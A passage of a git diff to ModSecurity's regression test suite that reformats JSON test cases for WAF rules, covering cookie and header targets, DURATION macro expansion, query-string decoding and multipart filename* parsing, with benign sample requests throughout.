"headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1.", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_COOKIES \"321\" \"id:1,log\"" + ] }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_HEADERS:'/(Content-Length|Transfer-Encoding)/' \"321\" \"id:1,log\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regular expressions in rule targets not respected (3/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1591", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Variable: REQUEST_HEADERS:Content-Length", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_HEADERS:'/(Content-Length|Transfer-Encoding)/' \"321\" \"id:1,log\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1725.json b/test/test-cases/regression/issue-1725.json index afd7c794e2..092c8862e2 100644 --- a/test/test-cases/regression/issue-1725.json +++ b/test/test-cases/regression/issue-1725.json @@ -1,42 +1,48 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Macro expansion on msg and logdata does not work for DURATION", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1725", - "gihub_issue": 1725, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Macro expansion on msg and logdata does not work for DURATION", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1725", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "body": "", - "method": "GET", - "http_version": 1.1, - "uri": "/test" - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "\/test; 0.[0-9]+; 0.[0-9]+;" - }, - "rules": [ - "SecRuleEngine On", - "SecRule DURATION \"@unconditionalMatch\" \"phase:2,id:10001,log,auditlog,pass,msg:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};',logdata:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};'\"" - ] -} + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "/test", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "/test; 0.[0-9]+; 0.[0-9]+;", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule DURATION \"@unconditionalMatch\" \"phase:2,id:10001,log,auditlog,pass,msg:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};',logdata:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};'\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1743.json b/test/test-cases/regression/issue-1743.json index 5e2b2fad35..bc17ea88b2 100644 --- a/test/test-cases/regression/issue-1743.json +++ b/test/test-cases/regression/issue-1743.json @@ -1,74 +1,88 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regex match does not work when arg ends with unescaped equal char (1/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1743", - "gihub_issue": 1743, - "client": { - "ip": "200.249.12.31", - "port": 2313 + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regex match does not work when arg ends with unescaped equal char (1/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1743", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "/?x=foo%3d", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "error_log": "Value: `foo='", + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" + ] }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "uri":"/?x=foo%3d", - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1", - "error_log": "Value: `foo='", - "http_code": 403 - }, - "rules": [ - "SecRuleEngine On", - "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regex match does not work when arg ends with unescaped equal char (2/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1743", - "gihub_issue": 1743, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "uri":"/?x=foo=", - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1", - "error_log": "Value: `foo='", - "http_code": 403 - }, - "rules": [ - "SecRuleEngine On", - "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regex match does not work when arg ends with unescaped equal char (2/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1743", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "/?x=foo=", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "error_log": "Value: `foo='", + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1785.json b/test/test-cases/regression/issue-1785.json index ba252b144f..ef8501686c 100644 --- a/test/test-cases/regression/issue-1785.json +++ b/test/test-cases/regression/issue-1785.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,18 +25,24 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 diff --git a/test/test-cases/regression/issue-1812.json b/test/test-cases/regression/issue-1812.json index 47c51933bd..ca8b8eef9b 100644 --- a/test/test-cases/regression/issue-1812.json +++ b/test/test-cases/regression/issue-1812.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Converting £ (%C2%A3) from query string", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1812", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1812", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,21 +25,28 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { - "debug_log": "\/test.pl\\?foo=\\\\xc2\\\\xa3&bar=\\\\xc2\\\\xa3" + "debug_log": "/test.pl\\?foo=\\\\xc2\\\\xa3&bar=\\\\xc2\\\\xa3", + "http_code": 200 }, "rules": [ "SecRuleEngine On", diff --git a/test/test-cases/regression/issue-1825.json b/test/test-cases/regression/issue-1825.json index 41fc349ff8..9d7a6aefd7 100644 --- a/test/test-cases/regression/issue-1825.json +++ b/test/test-cases/regression/issue-1825.json @@ -1,339 +1,372 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (1/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" +[ + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (1/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "350", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Target value: \"03CB1664.txt\" \\(Variable: MULTIPART_FILENAME" + "expected": { + "debug_log": "Target value: \"03CB1664.txt\" \\(Variable: MULTIPART_FILENAME", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (2/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (2/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "354", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename*= ISO-8859-1''ab0-_xy.txt; filename=\"ab0-_xy.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename*= ISO-8859-1''ab0-_xy.txt; filename=\"ab0-_xy.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Target value: \"ab0-_xy.txt\" \\(Variable: MULTIPART_FILENAME" + "expected": { + "debug_log": "Target value: \"ab0-_xy.txt\" \\(Variable: MULTIPART_FILENAME", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (3/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (3/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "326", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename*=utf-8''03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\r\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename*=utf-8''03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--\r" - ] - }, - "response":{ - "headers":"", - "body":"" - }, - "expected":{ - "debug_log":"Warning: no filename= but filename*" - }, - "rules":[ + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Warning: no filename= but filename*", + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (4/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (4/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "345", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=''03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=''03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Multipart: Invalid Content-Disposition header \\(-16" + "expected": { + "debug_log": "Multipart: Invalid Content-Disposition header \\(-16", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (5/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (5/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "349", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=UTF-8'03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=UTF-8'03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Multipart: Invalid Content-Disposition header \\(-17" + "expected": { + "debug_log": "Multipart: Invalid Content-Disposition header \\(-17", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (6/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (6/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "348", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%4G.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%4G.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Multipart: Invalid Content-Disposition header \\(-18" + "expected": { + "debug_log": "Multipart: Invalid Content-Disposition header \\(-18", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (7/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (7/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "348", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%62.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%62.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQBODY_ERROR \"!@eq 0\" \"id:1,phase:2,deny,status:403\"" ] } ] - diff --git a/test/test-cases/regression/issue-1831.json b/test/test-cases/regression/issue-1831.json index 773a0eec97..e8f5fc6e86 100644 --- a/test/test-cases/regression/issue-1831.json +++ b/test/test-cases/regression/issue-1831.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 1", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,21 +25,28 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { - "debug_log": "\\\\xc2\\\\xa3" + "debug_log": "\\\\xc2\\\\xa3", + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -51,7 +58,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 2", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -64,7 +71,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -72,18 +79,24 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "http_code": 200 @@ -101,7 +114,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 3", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -114,7 +127,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", 